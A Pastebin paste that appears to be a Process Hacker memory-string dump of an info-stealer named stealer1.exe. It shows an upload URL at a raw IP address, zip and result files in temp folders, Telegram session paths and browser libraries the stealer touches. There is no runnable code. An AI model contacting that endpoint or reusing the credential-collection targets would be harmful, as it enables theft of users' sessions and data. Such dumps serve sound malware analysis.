Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://141.105.71.82/Upload/
- file; filename .zip
- Content-Type: application/octet-stream
- id f9686f36-49cc-4f37-b2a9-b3b0572473cb (original af3c4c9f-8ea3-413f-af4b-5700ee9157bc)
- f9686f36-49cc-4f37-b2a9-b3b0572473cb
- af3c4c9f-8ea3-413f-af4b-5700ee9157bc
- Process Hacker 2.39.124
- Windows NT 6.1 Service Pack 1 (64-bit)
- 8/15/2018 7:26:16 AM
- 0x15b8fc (58): C:\Users\A\AppData\Local\Temp
- 0x15bbec (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
- 0x163444 (82): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
- 0x163c10 (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
- 0x16ac30 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
- 0x16b044 (24): MSVCP140.dll
- 0x16b0ea (22): RtlInitializeSListHead
- 0x16b370 (22): mozglue.dll
- 0x16b898 (30): C:\Users\A\AppData\Local\Temp\
- 0x16bc96 (62): 8C:\Users\A\AppData\Local\Temp\
- 0x16bec0 (36): C:\Users\A\AppData\Local\Temp\32.zip
- 0x16c2ce (62): 6C:\Users\A\AppData\Local\Temp\
- 0x16c4d8 (40): C:\Users\A\AppData\Local\Temp\result.txt
- 0x16ccf0 (44): C:\Program Files (x86)
- 0x16cef8 (29): C:tdata\D877F783D5D3EF8C\map0
- 0x16d308 (25): C:tdata\D877F783D5D3EF8C0
- 0x16d718 (29): C:tdata\D877F783D5D3EF8C\map1
- 0x16db28 (25): C:tdata\D877F783D5D3EF8C1
- 0x16db64 (138): \Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
- 0x16df10 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
- 0x16e208 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
- 0x16e338 (60): C:\Users\A\AppData\Local\Temp\
- 0x16e5f0 (98): C:\Program Files (x86)\IEInspector\HTTPAnalyzerF>
- 0x16e748 (60): C:\Users\A\AppData\Local\Temp\
- 0x16e950 (24): C:\Users\A\AppData\Local
- 0x16ea58 (19): 2018-08-15 07-22-39
- 0x16ebe8 (34): C:\Users\A\AppData\Local\Temp\.zip
- 0x16efe0 (144): C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-core-localization-
- 0x16f128 (20): C:\Users\A\Documents
- 0x16f230 (26): C:\Users\A\AppData\Roaming
- 0x16f338 (18): C:\Users\A\Desktop
- 0x16f3ec (66): api-ms-win-core-localization-l1-G
- 0x16f568 (30): C:\Users\A\AppData\Local\Temp\
- 0x16fba4 (12): PQRSTUVWXYZ[
- 0x16fcd8 (104): \Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
- 0x24ca78 (12): 3++S++
- 0x24d078 (12): 3++S++
- 0x24dcb0 (24): \KnownDlls32
- 0x24dcca (16): glue.dll
- 0x24e4b0 (16): Harddisk
- 0x24e4c8 (16): me2\Wind
- 0x24e676 (16): USERDA~1
- 0x24e68e (18): User Data
- 0x24e790 (16): \Session
- 0x24e7c0 (24): \Sessionvv1\
- 0x24e7e0 (130): \??\C:\Windows\SysWOW64\WindowsPowerShell\v1.0\MSVCP140.dlllC:\W\
- 0x24ece0 (58): C:\Windows\syswow64\ntdll.dll
- 0x24eea2 (15): Wow64ApcRoutine
- 0x24eeb2 (8): xception
- 0x24f1c0 (58): C:\Windows\SYSTEM32\wow64.dll
- 0x281320 (14): =::=::\
- 0x281330 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x28136e (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x2813b4 (96): CommonProgramFiles=C:\Program Files\Common Files
- 0x281416 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x28148e (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x2814f0 (28): COMPUTERNAME=O
- 0x28150e (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x281556 (38): FP_NO_HOST_CHECK=NO
- 0x28157e (24): HOMEDRIVE=C:
- 0x281598 (34): HOMEPATH=\Users\A
- 0x2815bc (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x281608 (30): LOGONSERVER=\\O
- 0x281628 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x2816b4 (72): MpConfig_ProductCodeName=AntiSpyware
- 0x2816fe (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x28176c (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x281814 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x28188c (44): NUMBER_OF_PROCESSORS=4
- 0x2818ba (26): OS=Windows_NT
- 0x2818d6 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x281a1a (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x281a96 (56): PROCESSOR_ARCHITECTURE=AMD64
- 0x281ad0 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x281b62 (34): PROCESSOR_LEVEL=6
- 0x281b86 (46): PROCESSOR_REVISION=9e09
- 0x281bb6 (52): ProgramData=C:\ProgramData
- 0x281bec (58): ProgramFiles=C:\Program Files
- 0x281c28 (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x281c7a (58): ProgramW6432=C:\Program Files
- 0x281cb6 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x281d38 (44): PUBLIC=C:\Users\Public
- 0x281d66 (38): SESSIONNAME=Console
- 0x281d8e (28): SystemDrive=C:
- 0x281dac (42): SystemRoot=C:\Windows
- 0x281dd8 (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x281e1e (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x281e62 (24): USERDOMAIN=O
- 0x281e7c (20): USERNAME=A
- 0x281e92 (44): USERPROFILE=C:\Users\A
- 0x281ec0 (34): windir=C:\Windows
- 0x281ee4 (46): windows_tracing_flags=3
- 0x281f14 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x2823b0 (38): C:\Users\A\Desktop\
- 0x2825b8 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x282780 (62): C:\Users\A\Desktop\stealer1.exe
- 0x2827c0 (68): "C:\Users\A\Desktop\stealer1.exe"
- 0x282806 (62): C:\Users\A\Desktop\stealer1.exe
- 0x282846 (30): Winsta0\Default
- 0x282870 (58): C:\Windows\SYSTEM32\ntdll.dll
- 0x2828c0 (38): C:\Windows\system32
- 0x282900 (38): C:\Windows\SYSTEM32
- 0x282b38 (22): C:\Windows\
- 0x282d6c (14): \SYSTEN
- 0x282d9c (14): TEM32\O
- 0x282dd0 (64): C:\Windows\SYSTEM32\wow64win.dll
- 0x282f80 (58): C:\Windows\SYSTEM32\wow64.dll
- 0x2830dc (14): TEM32\N
- 0x28313c (14): 2\wow6H
- 0x283150 (66): \Sessions\1\Windows\ApiPortection
- 0x2831b0 (30): stemFunction035
- 0x2831d0 (16): rogresst
- 0x2831e4 (12): ip.dll
- 0x283340 (64): C:\Windows\SYSTEM32\wow64cpu.dll
- 0x2834a0 (214): \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
- 0x283580 (20): figuration
- 0x283596 (16): Folders
- 0x283cb8 (238): \Registry\Machine\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
- 0x330800 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x33083e (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x330884 (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x3308f2 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x33096a (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x3309cc (28): COMPUTERNAME=O
- 0x3309ea (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x330a32 (38): FP_NO_HOST_CHECK=NO
- 0x330a5a (24): HOMEDRIVE=C:
- 0x330a74 (34): HOMEPATH=\Users\A
- 0x330a98 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x330ae4 (30): LOGONSERVER=\\O
- 0x330b04 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x330b90 (72): MpConfig_ProductCodeName=AntiSpyware
- 0x330bda (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x330c48 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x330cf0 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x330d68 (44): NUMBER_OF_PROCESSORS=4
- 0x330d96 (26): OS=Windows_NT
- 0x330db2 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x330ef6 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x330f72 (52): PROCESSOR_ARCHITECTURE=x86
- 0x330fa8 (56): PROCESSOR_ARCHITEW6432=AMD64
- 0x330fe2 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x331074 (34): PROCESSOR_LEVEL=6
- 0x331098 (46): PROCESSOR_REVISION=9e09
- 0x3310c8 (52): ProgramData=C:\ProgramData
- 0x3310fe (70): ProgramFiles=C:\Program Files (x86)
- 0x331146 (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x331198 (58): ProgramW6432=C:\Program Files
- 0x3311d4 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x331256 (44): PUBLIC=C:\Users\Public
- 0x331284 (38): SESSIONNAME=Console
- 0x3312ac (28): SystemDrive=C:
- 0x3312ca (42): SystemRoot=C:\Windows
- 0x3312f6 (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x33133c (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x331380 (24): USERDOMAIN=O
- 0x33139a (20): USERNAME=A
- 0x3313b0 (44): USERPROFILE=C:\Users\A
- 0x3313de (34): windir=C:\Windows
- 0x331402 (46): windows_tracing_flags=3
- 0x331432 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x331502 (14): h>@0DFp
- 0x331760 (38): C:\Users\A\Desktop\
- 0x331968 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x331b30 (62): C:\Users\A\Desktop\stealer1.exe
- 0x331b70 (68): "C:\Users\A\Desktop\stealer1.exe"
- 0x331bb6 (62): C:\Users\A\Desktop\stealer1.exe
- 0x331bf6 (30): Winsta0\Default
- 0x331c18 (14): =::=::\
- 0x331c28 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x331c66 (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x331cac (96): CommonProgramFiles=C:\Program Files\Common Files
- 0x331d0e (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x331d86 (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x331de8 (28): COMPUTERNAME=O
- 0x331e06 (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x331e4e (38): FP_NO_HOST_CHECK=NO
- 0x331e76 (24): HOMEDRIVE=C:
- 0x331e90 (34): HOMEPATH=\Users\A
- 0x331eb4 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x331f00 (30): LOGONSERVER=\\O
- 0x331f20 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x331fac (72): MpConfig_ProductCodeName=AntiSpyware
- 0x331ff6 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x332064 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x33210c (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x332184 (44): NUMBER_OF_PROCESSORS=4
- 0x3321b2 (26): OS=Windows_NT
- 0x3321ce (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x332312 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x33238e (56): PROCESSOR_ARCHITECTURE=AMD64
- 0x3323c8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x33245a (34): PROCESSOR_LEVEL=6
- 0x33247e (46): PROCESSOR_REVISION=9e09
- 0x3324ae (52): ProgramData=C:\ProgramData
- 0x3324e4 (58): ProgramFiles=C:\Program Files
- 0x332520 (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x332572 (58): ProgramW6432=C:\Program Files
- 0x3325ae (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x332630 (44): PUBLIC=C:\Users\Public
- 0x33265e (38): SESSIONNAME=Console
- 0x332686 (28): SystemDrive=C:
- 0x3326a4 (42): SystemRoot=C:\Windows
- 0x3326d0 (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x332716 (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x33275a (24): USERDOMAIN=O
- 0x332774 (20): USERNAME=A
- 0x33278a (44): USERPROFILE=C:\Users\A
- 0x3327b8 (34): windir=C:\Windows
- 0x3327dc (46): windows_tracing_flags=3
- 0x33280c (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x3328a8 (40): C:\Windows\SYSTEM32\
- 0x3328d2 (24): ROCESSOR_IDJ
- 0x3328f0 (38): C:\Windows\syswow64
- 0x332a28 (58): C:\Windows\SysWOW64\ntdll.dll
- 0x332a90 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x332c98 (64): C:\Windows\syswow64\kernel32.dll
- 0x332d80 (68): C:\Windows\syswow64\KERNELBASE.dll
- 0x332e7f (35):
- "C:\Users\A\Desktop\stealer1.exe"
- 0x332eb0 (98): C:\Windows\system32;C:\Windows\system;C:\Windows;
- 0x3334a8 (60): C:\Windows\syswow64\USER32.dll
- 0x333588 (58): C:\Windows\syswow64\GDI32.dll
- 0x3336b0 (54): C:\Windows\syswow64\LPK.dll
- 0x3337e8 (58): C:\Windows\syswow64\USP10.dll
- 0x3338b0 (60): C:\Windows\syswow64\msvcrt.dll
- 0x337870 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
- 0x337942 (14): Q!1AQaq
- 0x355710 (64): C:\Windows\syswow64\ADVAPI32.dll
- 0x3557e0 (60): C:\Windows\syswow64\RPCRT4.dll
- 0x3558a8 (62): C:\Windows\syswow64\SspiCli.dll
- 0x355970 (66): C:\Windows\syswow64\CRYPTBASE.dll
- 0x3559c0 (62): C:\Windows\syswow64\SHELL32.dll
- 0x355a08 (62): C:\Windows\SysWOW64\sechost.dll
- 0x355bd0 (62): C:\Windows\syswow64\SHLWAPI.dll
- 0x356098 (62): C:\Windows\syswow64\CRYPT32.dll
- 0x356160 (60): C:\Windows\syswow64\MSASN1.dll
- 0x3568e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x357368 (12): PR((*P
- 0x3573e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x3581a8 (60): C:\Windows\syswow64\WS2_32.dll
- 0x3581f0 (54): C:\Windows\syswow64\NSI.dll
- 0x358230 (62): C:\Windows\syswow64\WLDAP32.dll
- 0x358278 (64): C:\Windows\syswow64\Normaliz.dll
- 0x3589fe (124): 3system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\SystH
- 0x358ac6 (458): 6ilC:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x358cce (14): 5ft\Win
- 0x359546 (28): windir=C:\Wink
- 0x3595ac (120): racing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x359706 (7): \-`([Y%
- 0x35976c (7): }yaIpA
- 0x359e98 (58): C:\Windows\syswow64\MSCTF.dll
- 0x35a0c0 (58): C:\Windows\system32\IMM32.DLL
- 0x35b6ff (8): vDEFAULT
- 0x35b727 (8): v2.5.4.3
- 0x35b74f (8): v2.5.4.4
- 0x35b777 (8): v2.5.4.5
- 0x35b79f (8): v2.5.4.6
- 0x35b7c7 (8): v2.5.4.7
- 0x35b7ef (8): v2.5.4.8
- 0x35b817 (8): v2.5.4.9
- 0x35bd90 (27): CryptSIPDllPutSignedDataMsg
- 0x35bde0 (27): CryptSIPDllGetSignedDataMsg
- 0x35be30 (30): CryptSIPDllRemoveSignedDataMsg
- 0x35be80 (29): CryptSIPDllCreateIndirectData
- 0x35bed0 (29): CryptSIPDllVerifyIndirectData
- 0x35bf38 (23): CryptSIPDllIsMyFileType
- 0x35bf80 (23): CertDllVerifyRevocation
- 0x35bfc8 (21): CertDllVerifyCTLUsage
- 0x35c010 (20): CryptDllFormatObject
- 0x35c058 (22): CertDllEnumSystemStore
- 0x35c0a0 (20): CertDllOpenStoreProv
- 0x35c0e8 (20): CryptCNGPKCS12GetMap
- 0x35c130 (16): CryptCNGInitHMAC
- 0x35c178 (20): CryptDllEncodeObject
- 0x35c1c0 (20): CryptDllDecodeObject
- 0x35c208 (22): CryptDllEncodeObjectEx
- 0x35c250 (22): CryptDllDecodeObjectEx
- 0x35c2b8 (58): C:\Windows\syswow64\ole32.dll
- 0x35c300 (62): C:\Windows\system32\version.dll
- 0x35c348 (62): C:\Windows\system32\wsock32.dll
- 0x35c390 (62): C:\Users\A\Desktop\stealer1.exe
- 0x35c440 (22): NUMBER_OF_PROCESSORS=4
- 0x35c488 (26): PROCESSOR_ARCHITECTURE=x86
- 0x35c4d0 (23): PROCESSOR_REVISION=9e09
- 0x35c518 (26): ProgramData=C:\ProgramData
- 0x35c560 (22): PUBLIC=C:\Users\Public
- 0x35c5a8 (21): SystemRoot=C:\Windows
- 0x35c5f0 (22): USERPROFILE=C:\Users\A
- 0x35c638 (23): windows_tracing_flags=3
- 0x35c6a8 (52): C:\Users\A\AppData\Roaming
- 0x35c6f0 (48): C:\Users\A\AppData\Local
- 0x35c7c8 (62): C:\Windows\system32\secur32.dll
- 0x35c8a0 (62): C:\Windows\system32\mswsock.dll
- 0x35c8e8 (60): C:\Windows\System32\wship6.dll
- 0x35c9c0 (60): C:\Windows\system32\DNSAPI.dll
- 0x35ca08 (60): C:\Windows\system32\WINNSI.DLL
- 0x35cc00 (60): C:\Windows\system32\ncrypt.dll
- 0x35cc90 (56): Microsoft Package Negotiator
- 0x35ccd8 (58): NegoExtender Security Package
- 0x35cd20 (60): C:\Windows\SysWOW64\msv1_0.DLL
- 0x35cd68 (58): C:\Windows\SysWOW64\TsPkg.DLL
- 0x35cdb0 (58): C:\Windows\SysWOW64\pku2u.DLL
- 0x35cdf8 (62): C:\Windows\system32\credssp.dll
- 0x35ce40 (62): C:\Windows\system32\credssp.dll
- 0x35ce88 (60): C:\Windows\system32\bcrypt.dll
- 0x35cf20 (24): CryptSIPDllIsMyFileType2
- 0x35cf70 (29): CryptDllExportPublicKeyInfoEx
- 0x35cfc0 (29): CryptDllImportPublicKeyInfoEx
- 0x35d010 (36): CryptDllEncodePublicKeyAndParameters
- 0x35d068 (28): CryptDllConvertPublicKeyInfo
- 0x35d0a7 (21): v1.2.840.113549.1.1.1
- 0x35d0df (14): v1.3.14.3.2.22
- 0x35d10f (14): v1.3.14.3.2.12
- 0x35d13f (18): v1.2.840.10040.4.1
- 0x35d177 (18): v1.2.840.10046.2.1
- 0x35d1af (21): v1.2.840.113549.1.3.1
- 0x35d1e7 (21): v1.2.840.113549.1.1.1
- 0x35d21f (14): v1.3.14.3.2.22
- 0x35d24f (14): v1.3.14.3.2.12
- 0x35d27f (18): v1.2.840.10040.4.1
- 0x35d2c8 (41): CryptDllExtractEncodedSignatureParameters
- 0x35d328 (25): CryptDllSignAndEncodeHash
- 0x35d378 (30): CryptDllVerifyEncodedSignature
- 0x35d3e0 (30): CryptDllImportPublicKeyInfoEx2
- 0x35d430 (30): CryptDllExportPublicKeyInfoEx2
- 0x35d480 (26): CertDllOpenSystemStoreProv
- 0x35d4d0 (26): CertDllRegisterSystemStore
- 0x35d520 (28): CertDllUnregisterSystemStore
- 0x35d570 (28): CertDllRegisterPhysicalStore
- 0x35d5c0 (30): CertDllUnregisterPhysicalStore
- 0x35d610 (24): CertDllEnumPhysicalStore
- 0x35d660 (30): CryptDllExportPrivateKeyInfoEx
- 0x35d6b0 (30): CryptDllImportPrivateKeyInfoEx
- 0x35d700 (28): CryptMsgDllCNGExportKeyTrans
- 0x35d750 (28): CryptMsgDllCNGExportKeyAgree
- 0x35d7a0 (28): CryptMsgDllCNGImportKeyTrans
- 0x35d7f0 (28): CryptMsgDllCNGImportKeyAgree
- 0x35d840 (24): CryptMsgDllGenEncryptKey
- 0x35d890 (27): CryptMsgDllExportEncryptKey
- 0x35d8e0 (27): CryptMsgDllImportEncryptKey
- 0x35d930 (31): CryptMsgDllGenContentEncryptKey
- 0x35d980 (25): CryptMsgDllExportKeyTrans
- 0x35d9d0 (25): CryptMsgDllExportKeyAgree
- 0x35da20 (25): CryptMsgDllExportMailList
- 0x35da70 (25): CryptMsgDllImportKeyTrans
- 0x35dac0 (25): CryptMsgDllImportKeyAgree
- 0x35db10 (25): CryptMsgDllImportMailList
- 0x35db38 (64): C:\Windows\syswow64\oleaut32.dll
- 0x35dce8 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x35dd38 (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x35dd88 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x35ddd8 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x35de28 (35): ProgramFiles=C:\Program Files (x86)
- 0x35de78 (29): ProgramW6432=C:\Program Files
- 0x35dec8 (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x35df18 (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x35df98 (64): C:\Windows\System32\wshtcpip.dll
- 0x35dfe8 (64): C:\Windows\system32\IPHLPAPI.DLL
- 0x35e0d8 (64): C:\Windows\system32\rasadhlp.dll
- 0x35e128 (64): C:\Windows\System32\fwpuclnt.dll
- 0x35e198 (29): ProgramW6432=C:\Program Files
- 0x35e1e8 (35): ProgramFiles=C:\Program Files (x86)
- 0x35e238 (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x35e288 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x35e2d8 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x35e328 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x35e3c8 (46): CryptDllExportPublicKeyInfoFromBCryptKeyHandle
- 0x35e417 (9): v2.5.4.10
- 0x35e447 (9): v2.5.4.11
- 0x35e477 (9): v2.5.4.12
- 0x35e4a7 (9): v2.5.4.13
- 0x35e4d7 (9): v2.5.4.14
- 0x35e507 (9): v2.5.4.15
- 0x35e537 (9): v2.5.4.16
- 0x35e567 (9): v2.5.4.17
- 0x35e597 (9): v2.5.4.18
- 0x35e5c7 (9): v2.5.4.19
- 0x35e60f (9): v2.5.4.20
- 0x35e63f (9): v2.5.4.21
- 0x35e66f (9): v2.5.4.22
- 0x35e69f (9): v2.5.4.23
- 0x35e6cf (9): v2.5.4.24
- 0x35e6ff (9): v2.5.4.25
- 0x35e72f (9): v2.5.4.26
- 0x35e75f (9): v2.5.4.27
- 0x35e78f (9): v2.5.4.28
- 0x35e7bf (9): v2.5.4.29
- 0x35e7ef (9): v2.5.4.30
- 0x35e81f (9): v2.5.4.31
- 0x35e84f (9): v2.5.4.32
- 0x35e87f (9): v2.5.4.33
- 0x35e8af (9): v2.5.4.34
- 0x35e8df (9): v2.5.4.35
- 0x35e90f (9): v2.5.4.36
- 0x35e93f (9): v2.5.4.37
- 0x35e96f (9): v2.5.4.38
- 0x35e99f (9): v2.5.4.39
- 0x35e9cf (9): v2.5.4.40
- 0x35e9ff (9): v2.5.4.42
- 0x35ea2f (9): v2.5.4.43
- 0x35ea5f (10): v2.5.29.19
- 0x35ea8f (10): v2.5.29.10
- 0x35eabf (10): v2.5.29.21
- 0x35eaef (10): v2.5.29.37
- 0x35eb1f (9): v2.5.29.7
- 0x35eb4f (9): v2.5.29.8
- 0x35eb7f (10): v2.5.29.17
- 0x35ebaf (10): v2.5.29.18
- 0x35ebdf (9): v2.5.29.1
- 0x35ec0f (10): v2.5.29.35
- 0x35ec3f (10): v2.5.29.14
- 0x35ec6f (10): v2.5.29.15
- 0x35ec9f (9): v2.5.29.2
- 0x35eccf (9): v2.5.29.4
- 0x35ecff (10): v2.5.29.31
- 0x35ed2f (10): v2.5.29.46
- 0x35ed5f (10): v2.5.29.32
- 0x35ed8f (10): v2.5.29.20
- 0x35edbf (10): v2.5.29.27
- 0x35edf7 (27): v0.9.2342.19200300.100.1.25
- 0x35ee37 (22): v1.2.840.113549.1.9.20
- 0x35ee6f (22): v1.2.840.113549.1.9.21
- 0x35eea7 (21): v1.3.6.1.4.1.311.10.2
- 0x35eedf (23): v1.3.6.1.4.1.311.2.1.27
- 0x35ef17 (22): v1.2.840.113549.1.9.15
- 0x35ef4f (18): v1.3.6.1.5.5.7.1.1
- 0x35ef87 (19): v1.3.6.1.5.5.7.1.11
- 0x35efbf (21): v1.3.6.1.4.1.311.20.2
- 0x35efff (23): v1.3.6.1.4.1.311.13.2.3
- 0x35f04f (22): v2.16.840.1.113730.1.1
- 0x35f087 (22): v2.16.840.1.113730.1.2
- 0x35f0bf (22): v2.16.840.1.113730.1.3
- 0x35f0f7 (22): v2.16.840.1.113730.1.4
- 0x35f12f (22): v2.16.840.1.113730.1.7
- 0x35f167 (22): v2.16.840.1.113730.1.8
- 0x35f19f (23): v2.16.840.1.113730.1.12
- 0x35f1d7 (23): v2.16.840.1.113730.1.13
- 0x35f20f (23): v1.3.6.1.4.1.311.13.2.1
- 0x35f247 (21): v1.3.6.1.4.1.311.21.1
- 0x35f27f (23): v1.3.6.1.4.1.311.2.1.10
- 0x35f2b7 (21): v1.3.6.1.4.1.311.21.3
- 0x35f2ef (21): v1.3.6.1.4.1.311.21.4
- 0x35f327 (21): v1.3.6.1.4.1.311.21.2
- 0x35f35f (22): v1.3.6.1.4.1.311.21.10
- 0x35f397 (22): v1.3.6.1.4.1.311.21.11
- 0x35f3cf (22): v1.3.6.1.4.1.311.21.12
- 0x35f407 (21): v1.3.6.1.4.1.311.21.7
- 0x35f43f (22): v1.3.6.1.4.1.311.21.14
- 0x35f477 (23): v1.3.6.1.4.1.311.10.9.1
- 0x35f4af (24): v1.2.840.113549.1.12.1.1
- 0x35f4e7 (24): v1.2.840.113549.1.12.1.2
- 0x35f51f (24): v1.2.840.113549.1.12.1.3
- 0x35f557 (24): v1.2.840.113549.1.12.1.4
- 0x35f58f (24): v1.2.840.113549.1.12.1.5
- 0x35f5c7 (24): v1.2.840.113549.1.12.1.6
- 0x35f5ff (21): v1.2.840.113549.1.1.1
- 0x35f637 (18): v1.2.840.10040.4.1
- 0x35f66f (21): v1.2.840.113549.1.1.1
- 0x35f6a7 (18): v1.2.840.10040.4.1
- 0x35f6df (18): v1.3.6.1.5.5.7.2.2
- 0x35f717 (18): v1.3.6.1.5.5.7.1.1
- 0x35f74f (19): v1.3.6.1.5.5.7.1.11
- 0x35f787 (23): v1.3.6.1.4.1.311.2.1.14
- 0x35f7bf (22): v1.2.840.113549.1.9.14
- 0x35f7f7 (21): v1.3.6.1.4.1.311.10.2
- 0x35fa07 (7): vMemory
- 0x35fa2f (7): vSystem
- 0x35fa7f (6): vPKCS7
- 0x35faa7 (7): vPKCS12
- 0x36004f (10): v2.5.29.28
- 0x36007f (10): v2.5.29.30
- 0x3600af (10): v2.5.29.33
- 0x3600df (10): v2.5.29.36
- 0x36010f (11): vSerialized
- 0x36013f (11): vCollection
- 0x36016f (15): vSystemRegistry
- 0x36019f (9): vPhysical
- 0x3601cf (14): v1.3.14.3.2.26
- 0x3601ff (14): v1.3.14.3.2.12
- 0x36022f (14): v1.3.14.3.2.12
- 0x3602bf (9): v2.5.29.1
- 0x3602ef (9): v2.5.29.2
- 0x36031f (9): v2.5.29.4
- 0x36034f (9): v2.5.29.7
- 0x36037f (9): v2.5.29.8
- 0x3603af (10): v2.5.29.10
- 0x3603df (10): v2.5.29.15
